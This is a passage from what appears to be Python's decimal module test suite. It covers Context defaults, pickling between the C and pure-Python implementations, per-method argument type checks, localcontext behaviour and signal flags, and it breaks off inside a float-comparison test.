c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
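# Passing None for every argument must behave exactly like passing no
# arguments at all, so c1 and c2 should both end up with the defaults
# checked below.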
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
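# Only the private alias is checked here; the public `clamp` attribute
# itself (default 0, see test_none_args above) is unaffected.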
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
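# The C implementation has no _raise_error hook, so the helper above sets
# the flag directly and raises only when the signal is trapped, mirroring
# what _raise_error does in the pure-Python implementation.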
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
